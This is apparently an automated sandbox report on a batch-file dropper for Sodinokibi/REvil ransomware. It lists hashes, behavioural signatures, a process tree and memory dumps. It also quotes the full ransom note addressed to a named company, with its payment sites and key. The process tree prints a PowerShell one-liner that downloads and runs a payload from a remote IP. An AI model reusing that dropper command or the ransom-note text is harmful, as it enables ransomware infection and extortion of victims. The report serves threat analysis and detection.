Analysis

  • max time kernel
    129s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    24-08-2020 17:10

General

  • Target

    78db7807ce9e00993f72a5410cc869e8.bat

  • Size

    218B

  • MD5

    289804e7e330a37b07416d754819db89

  • SHA1

    8ed98b81615c3571fad40a840eae66f2de5fb035

  • SHA256

    d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09

  • SHA512

    ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8

Extracted

Path

C:\p6v98e-read-me.txt

Family

sodinokibi

Ransom Note
---=== Welcome Delco Automation Inc ===--- [+] Whats Happen? [+] Your network has been penetrated. Your files are encrypted with strong military algorithm, and currently unavailable. You can check it: all files on your system has extension p6v98e. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). Also, all your business info copyed to our servers. Personal data and business contacts extracted. If you do not take action to contact us, the data will be published for free access to everyone. As soon as we receive the payment, all data will be deleted from our servers. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C3AB008315086144 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C3AB008315086144 Contact with us in chat on website. You have 3 days. If you need more time to make a decision and collect money for payment - inform the support chat about this. [+] How will the decryption process proceed after payment? [+] After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: foi65ogVPF3y5+fI/rh5LqvocYN8rTYo7qudwbeY/YMKb6D/Au6eMSA2WJCYH8V3 oTOtkipLV/A72WhG+1U+omVDqDu6oSOl0DQ5xZbJDtGum/4FikhSf2fX6ZCumQu3 QOOHwZK09VIiPqN+awrVgKl0T3HY3RtCpFSMzaRSz70ETmLbUsKLzcZ/ZlxJW0xD XmVuwOY3w3FOgQBuQFumqe3vBH6PUhezrf0PCf1dCPg2RwUxhHMHLDOCY9r+rnYI yCX1tlpGxMMHGaxy2yJsFa7epD3qCCnBNi/vMCPS4b1NLdRQT2VCvHvEk0vXfF7I UahmnG4bESw4+iamMLl84v/1GN+9wGiF68Oz+U102+YOhS9uBbNnQt+ckqm1begW LC5FgnH4v906ywbnR3ZzXUms0pPS0EgxwL5YkuyDRBpE7KLqLX98hXxO9OPrACOo ceXaOgA5P158U9LrdcHBt0AUY0C1rCJpbsyhNvtD8YR4OJnxyEBFKhiZrN1L+ATJ Ko+HR2xMj6NKAh25adQ4X3PPFiTvtJ/LLXWnH+UCN5fH6OiNqUr35/bTHUlg9uav QOiztB13bvONCgW1y1mKP8hXHpG+v3HiWe6MpLRYV2tBM2gZJVjy72eM3VKDauUt 7qEEyVVWWDCwAWPlEr40nLJxNdz+Sn4X9HXBPTHxFEkERIB0oep80FUuRehnXIOx am8wUqqe6Kdcl1LCoWe+Cfjh1h0Li7PgzJ6t2t1u4ZGY9rvcexxLo/7Deote2Vdm ENnIcwZ6QzLo1xerS5WRCQMmwfzMhrv1kWqRpXR1Imi4urvRG0z6NyIrcVXasyej RmHhU2MikKvneoKZIQw0CFIxfst4bvIF7Q5tdMWmbROI1D+Z+NAr8A8AadBpIdo+ owCUiMKO902r/UgvQGpUfjX4CjWXMpDegAskqhQLCs4Bzp1sRxy/x/bIiLgbf3Wd YJQV+8WR2hYsHKXxiEKBofggfDoEaFTc8v17WKtGYjQKGgt4NhuXpqvMmoytQBdY MviVgRv0du7+Mr9fjhLL/0iBx6SlruxYwizBKwOQGulfcRgGVpn8RpVNcEF0efnk guGVVGjm4en2lUlpMW8GbNZYZBqTRLVi0CS+pLEddb0OqUqw6kSRCvAQzLumcj9B 7/oHHKdwN6r4LM5arVFViwSEf/1llRY1Cjshf2AiORnr66CtBiAltC3M0SVXivyE Bjw2bKXefpCXIlMkfQ6uZx5Zx1oUEkVXNK8zVLyPVedF5XHZJInAJwiMaRf0hs4x aXJXqmkC0unCyNJJzFJq4Q== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 115 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:344
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3864
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:2692

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3864-0-0x0000000000000000-mapping.dmp

  • memory/3864-1-0x0000000073790000-0x0000000073E7E000-memory.dmp

    Filesize

    6.9MB

  • memory/3864-2-0x0000000006B40000-0x0000000006B41000-memory.dmp

    Filesize

    4KB

  • memory/3864-3-0x0000000007270000-0x0000000007271000-memory.dmp

    Filesize

    4KB

  • memory/3864-4-0x0000000007150000-0x0000000007151000-memory.dmp

    Filesize

    4KB

  • memory/3864-5-0x0000000007950000-0x0000000007951000-memory.dmp

    Filesize

    4KB

  • memory/3864-6-0x00000000079C0000-0x00000000079C1000-memory.dmp

    Filesize

    4KB

  • memory/3864-7-0x0000000007CE0000-0x0000000007CE1000-memory.dmp

    Filesize

    4KB

  • memory/3864-8-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

    Filesize

    4KB

  • memory/3864-9-0x0000000008500000-0x0000000008501000-memory.dmp

    Filesize

    4KB

  • memory/3864-10-0x00000000082E0000-0x00000000082E1000-memory.dmp

    Filesize

    4KB

  • memory/3864-11-0x0000000009A60000-0x0000000009A61000-memory.dmp

    Filesize

    4KB

  • memory/3864-12-0x0000000008FF0000-0x0000000008FF1000-memory.dmp

    Filesize

    4KB